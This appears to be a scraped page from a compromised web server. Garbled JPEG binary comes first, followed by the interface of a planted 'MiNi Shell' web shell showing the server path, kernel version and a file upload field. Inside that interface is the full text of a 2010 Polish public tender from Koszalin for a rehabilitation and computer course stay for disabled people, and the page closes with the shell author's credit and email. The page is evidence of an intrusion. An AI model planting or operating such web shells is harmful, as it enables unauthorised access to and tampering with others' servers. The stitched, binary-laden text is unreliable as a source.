JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/247012-N-2010.html

<p class="kh_header"><b>Koszalin: Całodobowy Turnus rehabilitacyjno-szkoleniowego z kursem komputerowym dla 26 osób niepełnosprawnych z terenu powiatu koszalińskiego objętych wsparciem w ramach Programu Operacyjnego Kapitał Ludzki; projekt systemowy Pomocna dłoń plus</b><br>
<b>Numer ogłoszenia: 247012 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Koszalinie , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. (094) 34 28 455, faks (094) 34 28 455.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całodobowy Turnus rehabilitacyjno-szkoleniowego z kursem komputerowym dla 26 osób niepełnosprawnych z terenu powiatu koszalińskiego objętych wsparciem w ramach Programu Operacyjnego Kapitał Ludzki; projekt systemowy Pomocna dłoń plus.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia w miejscowości uzdrowiskowej położonej nad polskim morzem :

- całodobowego Turnusu rehabilitacyjno-szkoleniowego z kursem komputerowym dla 26 osób niepełnosprawnych zgodnie z przepisami ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2008r. Nr 14 , poz.92 z późn.zm.) i rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku  w sprawie turnusów rehabilitacyjnych ( Dz.U. Nr 230 , poz.1694 z póz.zm.) wraz z 9 opiekunami osób niepełnosprawnych oraz 1 przedstawicielem Zamawiającego.
Łącznie 36 osób.

Ośrodek, w którym będzie odbywać się turnus rehabilitacyjny  musi mieć wpis do rejestru ośrodków, w których mogą odbywać się turnusy rehabilitacyjne dla zorganizowanych grup 
turnusowych osób niepełnosprawnych z uwzględnieniem potrzeb osób poruszających się na wózkach. 

I. Wymagany termin realizacji przedmiotu zamówienia:  01.09.2010 - 14.09.2010r., 14 dni pobytowych.

II. Celem uczestnictwa w turnusie rehabilitacyjnym z kursem komputerowym jest pobudzenie aktywności zawodowej i społecznej, identyfikacja swoich umiejętności i poszerzenia ich celem usamodzielnienia się, integracji społecznej i zdrowotnej. Nabycie przez uczestników umiejętności obsługi komputera niezbędnych do podjęcia aktywizacji zawodowej i społecznej. Wykonawca zobowiązany jest wydać uczestnikom  zaświadczenia o uczestnictwie w turnusie i ukończeniu kursu. 

III. Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 

1. Zamawiający wymaga, aby zajęcia były prowadzone przez osoby posiadające    odpowiednie kwalifikacje. 
Wymagania kadrowe dotyczące organizacji turnusu rehabilitacyjnego zawarte są w 
rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku  w 
sprawie turnusów rehabilitacyjnych ( Dz.U. Nr 230 , poz.1694 z póz.zm.).
Wymagania kadrowe dotyczące organizacji kursu komputerowego: co najmniej 1 trener 
o wyższym wykształceniu  informatycznym.
2. Zamawiający wymaga, aby Wykonawca zabezpieczył dla uczestników: bazę rehabilitacyjną i szkoleniową wraz ze sprzętem niezbędnym do realizacji rehabilitacji i szkolenia.
3. Turnus rehabilitacyjno szkoleniowy będzie odbywał się w miejscowości nad polskim morzem, w ośrodku oddalonym od plaży do 100m.
4. Dojazd wszystkim uczestnikom  do ośrodka organizującego turnus zapewni Wykonawca (usługa obejmuje zarówno dojazd jak i powrót z uwzględnieniem specyfiki transportu osób na wózkach) . Listę osób z podaniem adresów Zamawiający przekaże Wnioskodawcy najpóźniej w dniu  podpisania umowy ( wykaz miejscowości z których należy dowieźć uczestników turnusu do miejsca docelowego załączony do szczegółowego opisu przedmiotu zamówienia). 
5. Wykonawca zapewni uczestnikom turnusu i  opiekunom  pełne wyżywienie: śniadanie, obiad, kolacja  dziennie z uwzględnieniem odpowiednich diet dostosowanych do ich stanu zdrowia (śniadanie i kolacja w formie szwedzkiego stołu).
6. Uczestnicy turnusu i opiekunowie będą zakwaterowani w pokojach 2 -  osobowych przy czym każdy pokój wyposażony będzie w łazienkę (wc, umywalka, natrysk), telewizor. W każdym pokoju będzie dostępna na bieżąco woda mineralna.
7. Kurs komputerowy - min. 20 godz. dla każdego uczestnika kursu będzie odbywał się  na terenie ośrodka, gdzie organizowany jest turnus rehabilitacyjny (obowiązkowo w czasie kursu serwis kawowy).  
8. Liczba godzin kursu komputerowego dla każdego uczestnika szkolenia wynosi min. 20 godzin w tym: zajęcia teoretyczne i zajęcia praktyczne, dostosowane do indywidualnych możliwości uczestników. 
9. Wykonawca zapewni uczestnikom co najmniej 2 zabiegi rehabilitacyjne dziennie zlecone przez lekarza dopasowane do schorzeń. Każdy z uczestników będzie w posiadaniu właściwego zaświadczenia lekarskiego, na podstawie którego będzie korzystał z zabiegów rehabilitacyjnych.
10. Wykonawca zapewni uczestnikom turnusu i opiekunom zajęcia integracyjne o charakterze kulturalno-rozrywkowym przez 3 godz. dziennie zgodnie z rozporządzeniem w sprawie turnusów rehabilitacyjnych
11.  Wykonawca zapewni uczestnikom turnusu i opiekunom, co najmniej jedną wycieczkę krajoznawczą, której plan przedstawi w ofercie.
12. Ośrodek realizujący turnus rehabilitacyjny zapewni osobę nadzorującą i odpowiadającą za przebieg turnusu i kursu komputerowego (osoba ta będzie ściśle współpracowała z przedstawicielem Zamawiającego). 
13. Ośrodek realizujący szkolenie zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie szkolenia. 
14.Wykonawca zapewni animatora dla uczestników turnusu i opiekunów odpowiedzialnego za koordynację pobytu grupy na turnusie (osoba ta będzie ściśle współpracowała z przedstawicielem Zamawiającego).
15.Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników turnusu i opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka.  
16.Wykonawca zorganizuje i przeprowadzi  program kulturalno-oświatowy dla wszystkich uczestników turnusu i opiekunów, odpowiedni do rodzaju ich schorzeń.
17.Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika turnusu i opiekuna obejmujące dojazd uczestników turnusu z miejsca zamieszkania do miejsca odbywania się turnusu oraz dojazd z miejsca odbywania się turnusu do miejsca zamieszkania uczestników turnusu, całodobowy 14 dniowy pobyt na turnusie rehabilitacyjnym, na kwotę nie niższą niż 10 000 zł na jedną osobę.


IV. Zamówienie  w zakresie kursu komputerowego obejmuje: 
1. Przygotowanie harmonogramu zajęć w ramach kursu komputerowego, który powinien zawierać: tematykę zajęć, liczbę godzin zegarowych, miejsce realizacji szkolenia oraz nazwisko osoby prowadzącej zajęcia w każdym dniu szkolenia. 
2. Przeprowadzenie turnusu i kursu zgodnie z programem i harmonogramem turnusu rehabilitacyjnego zatwierdzonego przez Zamawiającego. 
3. Przeprowadzenie poszczególnych zajęć kursu komputerowego winno być potwierdzane w listach obecności przeprowadzanych zajęć, każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i osobę szkoloną. 
4. Wykonawca realizujący szkolenie zapewni: 
4.1. Komputery po jednym na każdą osobę szkoloną. 
4.2. Pracę w grupach nie większych niż 8 osób.
4.3. Bezpłatne materiały szkoleniowe dla każdego uczestnika szkolenia, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie absolwentów w/w szkolenia. 
4.4. Serwis kawowy (kawa, herbata, woda mineralna, soki, ciastka).
5. Program kursu powinien: 
5.1. gwarantować uczestnikom szkolenia rzetelne przygotowanie teoretyczne oraz praktyczne oraz nabycie umiejętności niezbędnych do posługiwania się komputerem.   
6. Program kursu powinien zawierać co najmniej następujące zagadnienia: 
6.1. nazwę i zakres, 
6.2. czas trwania i sposób organizacji, 
6.3. Po ukończeniu szkolenia wydanie zaświadczenia z logo Unii Europejskiej i Kapitału Ludzkiego, Instytucji Pośredniczącej i PCPR. 
7. Zapewnienie sali szkoleniowej do przeprowadzenia zajęć, wyposażonej w odpowiednią liczbę miejsc, stolików dostosowaną do ilości osób szkolonych wraz z zapleczem sanitarnym. 
8. Prowadzenie dokumentacji przebiegu szkolenia tj: dziennika zajęć edukacyjnych zawierającego listę obecności; wymiar godzin i tematy zajęć edukacyjnych; rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia. 
9. Wykonawca zobowiązuje się do promowania Unii Europejskiej, Kapitału Ludzkiego, Instytucji Pośredniczącej i PCPR poprzez umieszczenie w miejscu odbywania szkolenia, na wszystkich materiałach związanych z przeprowadzeniem turnusu w szczególności na dokumentach dotyczących przebiegu realizacji kursu; materiałach szkoleniowych; wydawanych dyplomach /certyfikatach lub innych zaświadczeniach/ logo Unii Europejskiej, Programu Operacyjnego Kapitał Ludzki, Instytucji Pośredniczącej i PCPR oraz informacji: Szkolenie realizowane jest w ramach projektu Pomocna dłoń plus współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
10. Zamawiający zastrzega sobie prawo do kontroli przebiegu i realizacji szkolenia oraz wprowadzenia adnotacji do dziennika zajęć. 

V. Zamówienie  w zakresie turnusu rehabilitacyjnego  obejmuje: zakres zgodny z wymaganiami określonymi w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku  w sprawie turnusów rehabilitacyjnych ( Dz.U. Nr 230 , poz.1694 z póz.zm.).

Wykaz miejscowości, z których należy zabezpieczyć dojazd uczestnikom turnusu rehabilitacyjnego:
gm. Sianów (4 osoby miasto Sianów; Wierciszewo - 3 osoby, w tym jedna na wózku inwalidzkim; Maszkowo - 2 osoby; Dąbrowa 2 osoby, w tym jedna na wózku inwalidzkim, Sierakowo - 1 osoba; Skibno - 1 osoba);

gm. Polanów  ( 4 osoby miasto Polanów, w tym jedna na wózku inwalidzkim; Domachowo - 1 osoba; Gołogóra - 1 osoba; Bukowo - 1 osoba);

gm. Bobolice (2 osoby miasto Bobolice; Kurowo - 1 osoba);

gm. Świeszyno  ( Giezkowo - 1 osoba, Chłopska Kępa - 2 osoby, w tym jedna na wózku inwalidzkim);
gm. Będzino (Będzino - 2 osoby, Mączno - 2 osoby, w tym jedna na wózku inwalidzkim, Wierzchomino - 1 osoba);
gm. Biesiekierz (Stare Bielice - 2 osoby, w tym jedna na wózku inwalidzkim);
gm. Manowo   (Bonin - 2 osoby, w tym jedna na wózku inwalidzkim);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i   instytucjach rynku pracy - ( Dz. U. 2008 r. Nr 69 poz. 415 z późn.zm.) wpisu Wykonawcy  do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy, a w przypadku gdy Wykonawca będzie wykonywał  kurs komputerowy przy pomocy podwykonawcy  -  wpis taki musi posiadać podwykonawca,
- zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych w danym Wojewódzkim Urzędzie Pracy (zgodnie z rozporządzeniem Ministra Gospodarki  i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych - Dz.U.  z 2004 r. Nr 236 poz. 2365).

- zgodnie z art.10c  ust.2 ustawy z dnia 27 sierpnia 1997 roku o rehabilitacji zawodowej i 
  społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2008r. Nr 14 , poz.92 z 
  późn.zm.) - wpisu Wykonawcy do rejestru organizatorów turnusów prowadzonego przez 
  wojewodę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ oferta sporządzona według wzoru - załącznik Nr 2 do SIWZ ,
2/ zaświadczenie o wpisie  Wykonawcy do rejestru instytucji szkoleniowych prowadzonego przez  właściwy Wojewódzki Urząd Pracy, a w przypadku gdy Wykonawca będzie wykonywał  kurs komputerowy przy  pomocy podwykonawcy zaświadczenie o wpisie  podwykonawcy do  rejestru instytucji szkoleniowych prowadzonego przez właściwy  Wojewódzki Urząd Pracy,  
3/ aktualny wpis Wykonawcy do rejestru organizatorów turnusów prowadzonego przez 
  wojewodę,
4/ aktualny wpis ośrodka Wykonawcy do rejestru ośrodków prowadzonego przez właściwego
  wojewodę , w których mogą odbywać się turnusy rehabilitacyjne dla zorganizowanych grup 
  turnusowych osób niepełnosprawnych,
5/ oświadczenie o spełnianiu warunków z art.22 ust.1 ustawy Prawo zamówień publicznych
   - załącznik Nr 3 do SIWZ
6/ oświadczenie Wykonawcy o braku podstaw do wykluczenia z udziału w postępowaniu - w 
   trybie art. 24 ust. 1 - załącznik Nr 4  do SIWZ ,
7/ oświadczenie Wykonawcy, że osoby, które będą uczestniczyć w wykonaniu zamówienia  
    posiadają wymagane kwalifikacje i uprawnienia - załącznik nr 5 do SIWZ
8/ aktualny  odpis  z  właściwego  rejestru  albo aktualne zaświadczenie o wpisie do 
    ewidencji  działalności gospodarczej wystawione  nie wcześniej niż 6 miesięcy przed 
    upływem terminu składania ofert
9/ jeżeli oferta  i  załączniki zostaną  podpisane przez upoważnionego przedstawiciela 
    wykonawcy, należy dołączyć do oferty dokument obejmujący takie upoważnienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników turnusu rehabilitacyjnego z przyczyn niezależnych od Zamawiającego i będącego wynikiem: 
a) rezygnacji kandydata z udziału w turnusie rehabilitacyjny z kursem komputerowym pomimo wcześniejszych deklaracji o uczestnictwie, 
b) niestawienia się kandydata na turnus rehabilitacyjny z kursem komputerowym pomimo wezwania Powiatowego Centrum Pomocy Rodzinie  w Koszalinie,
c) przerwania uczestnictwa w turnusie (choroba, rezygnacja z uczestnictwa), którego nie można było przewidzieć w dniu zawarcia umowy, 
d) stwierdzenia niezdolności do uczestnictwa w turnusie lub kursie komputerowym przez lekarza medycyny. 

W powyższych przypadkach w umowie zmianie ulega przeliczenie kosztu turnusu. W takim przypadku koszt turnusu stanowi iloczyn kosztu turnusu jednej osoby niepełnosprawnej oraz rzeczywistej ilości osób niepełnosprawnych  i ich opiekunów , które ukończyły turnus.
W przypadku przerwania uczestnictwa w turnusie koszty udziału takiej osoby w turnusie ustala się w wysokości proporcjonalnej do liczby niewykorzystanych dni  turnusu.
Zmiana umowy dokonuje się w trybie aneksu do umowy podpisanej przez Zamawiającego i Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprkoszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Koszalinie ul. Racławicka 13, pokój Nr 217..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2010 godzina 15:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Koszalinie ul. Racławicka 13, pokój Nr 217..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com